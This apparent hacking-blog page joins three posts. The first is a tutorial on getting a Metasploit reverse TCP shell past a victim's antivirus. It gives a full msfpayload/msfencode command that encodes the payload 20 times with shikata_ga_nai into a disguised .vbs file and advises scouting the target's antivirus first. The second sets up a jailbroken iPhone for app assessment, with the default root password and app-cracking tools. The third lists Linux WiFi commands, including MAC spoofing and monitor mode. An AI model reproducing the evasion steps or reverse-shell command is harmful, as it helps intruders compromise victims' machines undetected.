I’ve written several listener guides on creating a malicious PDF or malicious Word document that would carry in it a payload with the Meterpreter, or reverse shell enabling you to own the system. One of the hurdles to using these techniques is the antivirus (AV) software on the target system. For instance, if you try to email a malicious PDF or Word doc, it’s likely that the victim system will alert the victim that it contains a virus or other malware.
The key lesson in this tutorial is how we can get past that antivirus software.

cryptingThe Basics of How Antivirus Software Works

Antivirus software companies generally develop their software to look for a “signature” of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database and when it next encounters that malware, the software alerts the computer owner.

How You Could Bypass Antivirus Software

Obviously, zero-day exploits, or malware that is brand new and never been seen by the AV software companies, will pass right by such a detection scheme.
Another method of getting past the AV software is to simply change the “signature” of the malware. In other words, if we can change the encoding of the malware without changing its functionality, it should sail right past the AV software without detection. If you have the coding skills, you can re-code any malware and get this desired result.
If you don’t have these advanced coding skills, there is still hope! Metasploit has a built-in command called msfencode.

How to Change the Signature of Metasploit Payloads

In this tutorial, we will take a more in-depth look at this command and its capabilities for re-coding our payloads. A quick note before we get started—do your reconnaissance!
Find out what AV software the target system is using and re-encode to evade that AV package. No re-encoding scheme will work with all AV software, so don’t waste time developing a new encoding scheme that works with your AV software, but may not evade the target system’s AV software.
So, let’s open up BackTrack or Kali and fire up Metasploit!

Step 1: Use Msfencode

Let’s begin by simply typing msfencode at our prompt with the -h switch for help.
msfencode -h
As you can see, this displays all the key switches that we can use with this command. Note the -e switch. This designates the encoder we want to use to re-encode our payload.
Also, note the section I have highlighted with the -t switch. This switch determines what the output format is. You can see there are numerous formats including raw, ruby, perl, java, exe, vba, vbs, etc. Each of these outputs gives us an opportunity to change the signature and attempt to evade the AV software.

Step 2: List the Encoding Schemes

Next, let’s look at what encoders are available in msfencode.
msfencode -l
As this screenshot shows, msfencode includes numerous different encoding schemes. Fourth from the bottom we see “shikata_ga_nai.” Note that it is rated “excellent” and it’s a “Polymorphic XOR Additive Feedback Encoder.” Let’s take a look at that one.

What’s That Strange Sounding Encoder?

First, this strange sounding shikata_ga_nai encoder is a Japanese phrase that loosely translates to “nothing can be done about it.” An excellent name for an encoder with bad intentions!
Second, it’s an additive XOR polymorphic encoder. Without going into too much detail, this means that it will change its shape/signature (polymorphic), by using an XOR encrypting scheme. XOR is far from a perfect encryption scheme, but it’s efficient and can generate multiple shapes/signatures quickly that can then be decrypted by the code itself once it arrives at the target.

Step 3: Re-Code Our Payload

Now, let’s use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. At the command prompt in BackTrack, type:
msfpayload windows/shell/reverse_tcp LHOST 192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/AVbypass.vbs

The Breakdown

Let’s take this command apart and see what it does.
msfpayload windows/shell/reverse_tcp LHOST 192.168.1.101 R
The above part creates a payload with the reverse TCP shell for a local host at 192.168.1.101.
The “|”
This symbol means pipe that payload to the following command.
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
Means re-encode that payload with skikata_ga_nai and run it 20 times (-c 20), and then encode it to look like a .vbs script.
> /root/AVbypass.vbs
Means send the newly encoded payload to a file in the /root directory and name it AVbypass.vbs so that it appears to be a .vbs script.

The Result

When we run this command, we get the following output showing us that shikata_ga_nai is running our payload through 20 iterations (-c 20).
Now let’s go to the directory we told shikata_ga_nai to send our newly encoded payload to and check to see whether it is there.
cd /root
ls -l
As you can see, we now have a file in our root directory called AVbypass.vbs that we can now test against the target’s AV software to see whether it detects it. This method works in most cases, but if it doesn’t, simply send the payload through various number of iterations until you find an encoding that the AV software does not detect. Yea Buddy!
Read More
Now that you have your shiny new Evasion7 jailbreak running it’s time to set up the environment for application testing!

Getting in

Since mobile substrate is not working yet we will focus on getting our idevice up and running as a functioning *nix environment and install some tools that don’t require substrate.
First we need to get into our iDevices shell prompt. We will browse Cydia(that gets installed by default with the jailbreak) and then will install the openSSH package.
Once we get openSSH installed you can SSH into your device by finding its IP address in the Settings > Wireless Networks > Advanced “>” menu.
Now SSH into port 22  on that IP using the username “root” and the password “alpine“.
Once we have shell we can use APT to install most of the other packages we need. Also change the default root password to something else so people can’t mess with your phone! Arming your iDevice with *nix tools To have a functioning *nix environment we need to install a ton of utilities that aren’t usually installed as part of the default jailbreak or Bash shell. This includes utilities like strings, grep, awk, find, etc…
Some of the utility packages do not verbatim tell what’s inside of them; things like big boss tools and Erika utilities.
These two in specific install strings and other binutils type tools. Several of them patched or modded to work on the iOS architecture (arm).
Packages (some of these will be pre-installed with the JB):
adv-cmds
apr
apr-lib
apr-util
apt
apt7
apt7-key
apt7-lib
apt7-ssl
base
bash
basic-cmds
berkeleydb
bigbosshackertools
bootstrap-cmds
bzip2
class-dump
com.ericasadun.utilities
com.evad3rs.evasi0n7
com.innoying.sbutils
coreutils
coreutils-bin
curl
cy+cpu.arm
cy+kernel.darwin
cy+lib.corefoundation
cy+model.ipad
cy+os.ios
cydia
cydia-lproj
darwintools
debianutils
developer-cmds
diffutils
diskdev-cmds
dpkg
expat
file
file-cmds
findutils
firmware
firmware-sbin
gawk
gdb
gettext
git
gnupg
grep
gzip
inetutils
iokittools
ldid
less
libffi
libxml2
libxml2-lib
lsof
lzma
make
nano
ncurses
neon
network-cmds
odcctools
openssh
openssl
org.thebigboss.repo.icons
p7zip
pam
pam-modules
patch
pcre
profile.d
python
readline
rsync
sed
shell-cmds
sqlite3
sqlite3-lib
subversion
system-cmds
tar
tcpdump
top
uikittools
unrar
unzip
uuid
vim
wget
whois
xar
xml2
zip
Take this list and dump it to a file (packages.txt) and run:
apt-get  install $(<packages.txt)

Extras

In addition to utilities that help make our iDevice a functioning *nix environment there are several tools that aid in connecting, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations (some cut from my OWASP page):
Tool
Link
Description
USBMuxd
http://cgit.sukimashita.com/usbmuxd.git/
Tunnel ports over USB (enable SSH without network using localhost:2222)
libimobiledevice
http://www.libimobiledevice.org/
Library. Custom implementation of iTunes type connections, file-system access, system access.
Filemon
Monitor realtime iOS file system
FileDP
Audits data protection of files
BinaryCookieReader
Read cookies.binarycookies files
lsof ARM Binary
list of all open files and the processes that opened them
lsock ARM Binary
monitor socket connections
removePIE
Disables ASLR of an application
Clutch
https://github.com/KJCracks/Clutch-dl/releases
Application Cracker compiled (remove encryption)
Rasticrac
https://twitter.com/iRastignac
Application Cracker (BASH GDB Wrapper)

Next Steps

This is just the basics.
Once you get all of these utilities and tools installed you’re pretty much waiting on substrate to be working for iOS 7. After that’s done you can install your favorite all encompassing or homegrown tool that uses substrate to do hooking such as Cycript, Inlyzer, SSLKillSwitch, Snoopit, IntroSpy, iAuditor, etc.
Then you just have to MitM the web traffic. There are plenty of guides on that around the net.
If you have other tools you use in your app assessment setup I’d love to hear about them. Feel free to leave suggestions in the comments.
Read More

Useful Linux WiFi Commands

NOTE: NOT ALL CARDS/FIRMWARE SUPPORT ALL OF THE COMMANDS LISTED BELOW.
Note: To connect your Linux machine to a WLAN using WPA, WPA2 or 802.1X you will need to use WPA Supplicant

Connecting to an OPEN / WEP WLAN (DHCP)

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
  1. iwconfig [interface] mode managed key [WEP key] (128 bit WEP use 26 hex characters, 64 bit WEP uses 10)
  2. iwconfig [Interface] essid “[ESSID]“ (Specify ESSID for the WLAN)
  3. dhclient [interface] (to receive an IP address, netmask, DNS server and default gateway from the Access Point)
  4. ping www.bbc.co.uk  (if you receive a reply you have access)

Connecting to an OPEN / WEP WLAN (Manual IP Setup)

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.) It may be necessary to run some packet capture software (e.g. Ethereal) to determine the IP addresses of both the Default Gateway and DNS servers.
  1. iwconfig [interface] mode managed key [WEP key] (128 bit WEP use 26 hex characters, 64 bit WEP uses 10)
  2. iwconfig [interface] essid “[ESSID]“
  3. ifconfig [interface] [IP address] netmask [subnetmask]
  4. route add default gw [IP of default gateway] (Configure your default gateway; usually the IP of the Access Point)
  5. echo nameserver [IP address of DNS server]  >>  /etc/resolve.conf (Configure your DNS server)
  6. ping www.bbc.co.uk (if you receive a reply you have access)

iwconfig Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
  • iwconfig [interface] mode master (set the card to act as an access point mode)
  • iwconfig [interface] mode managed (set card to client mode on a network with an access point)
  • iwconfig [interface] mode ad-hoc (set card to peer to peer networking or no access point mode)
  • iwconfig [interface] mode monitor (set card to RFMON mode our favourite)
  • iwconfig [interface] essid any (with some cards you may  disable the  ESSID  checking)
  • iwconfig [interface] essid “your ssid_here” (configure ESSID for network)
  • iwconfig [interface] key 1111-1111-1111-1111 (set 128 bit WEP key)
  • iwconfig [interface] key 11111111 (set 64 bit WEP key)
  • iwconfig [interface] key s:mykey (set key as an ASCII string)
  • iwconfig [interface] key off (disable WEP key)
  • iwconfig [interface] key open (sets open mode, no authentication is used and card may accept non-encrypted sessions)
  • iwconfig [interface] channel [channel no.] (set a channel 1-14)
  • iwconfig [interface] channel auto (automatic channel selection)
  • iwconfig [interface] freq 2.422G (channels can also be specified in GHz)
  • iwconfig [interface] ap 11:11:11:11:11:11 (Force card to register AP address)
  • iwconfig [interface] rate 11M (card will use the rate specified)
  • iwconfig [interface] rate auto (select automatic rate)
  • iwconfig [interface] rate auto 5.5M (card will use the rate specified and any rate below as required)

ifconfig Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
ifconfig [interface] up (bring up specified interface)
ifconfig [interface] down (take down specified interface)
ifconfig [interface] [IP address] netmask [subnet-mask] (manually set IP and subnet-mask details)
ifconfig [interface] hw ether [MAC] (Change the wireless cards MAC address, specify in format 11:11:11:11:11:11)

iwpriv Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
  • iwpriv [interface] hostapd 1 (used to set card mode to hostapd e.g. for void11)
When the monitor mode patch is installed as per the Wireless Build HOWTO the following commands may be used to set the card into monitor mode.
  • iwpriv [interface] monitor [A] [B]
    • [A]
      • 0 = disable monitor mode
      • 1 = enable monitor mode with Prism2 header
      • 2 = enable monitor mode with no Prism2
    • [B]
      • Channel to monitor (1-14)

iwlist Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.) iwlist is used to display some large chunk of information from a wireless network interface that is not displayed by iwconfig.
  • iwlist [interface] scan (Give the list of Access Points and Ad-Hoc cells in range (ESSID, Quality, Frequency, Mode etc.) Note: In tests only worked with Atheros cards).
  • iwlist [interface] channel (Give the list of available frequencies in the device and the number of channels).
  • iwlist [interface] rate (List the bit-rates supported by the device).
  • iwlist [interface] key (List the encryption key sizes supported and display all the encryption keys available in the device).
  • iwlist [interface] power (List the various Power Management attributes and modes of the device).
  • iwlist [interface] txpower (List the various Transmit Power available on the device).
  • iwlist [interface] retry (List the transmit retry limits and retry lifetime on the device).
  • iwlist [interface] ap (Give the list of Access Points in range, and optionally the quality of link to them.  Deprecated in favour of scan)
  • iwlist [interface] peers (Give the list of Peers associated/registered with this card).
  • iwlist [interface] event (List the wireless events supported by this card).

Madwifi-ng Commands

MADWiFi supports virtual access points (VAPS), which means you can create more than one wireless device per wireless card (the host wireless card = wifi0).
By default, a sta mode VAP is created by, which is MadWifi talk for a ‘managed mode wireless interface’.
Note: replace athx with your interface name as required (e.g. ath0, ath1)
  • wlanconfig athx destroy (Destroy VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode sta (Create a managed mode VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode ap (Create an Access Point VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode adhoc (Create an Ad-Hoc VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode monitor (Create a Monitor mode VAP, athx)
  • Changing modes:
    • ifconfig athx down (Take the VAP down)
    • wlanconfig athx destroy (Destroy the VAP, athx)
    • wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor] (Create a new sta, adhoc, ap or monitor VAP)
  • Scan for Access Points (requires both steps):
    • modprobe wlan_scan_sta (To insert the scanning module)
    • wlanconfig athx list scan (To list the APs)
Read More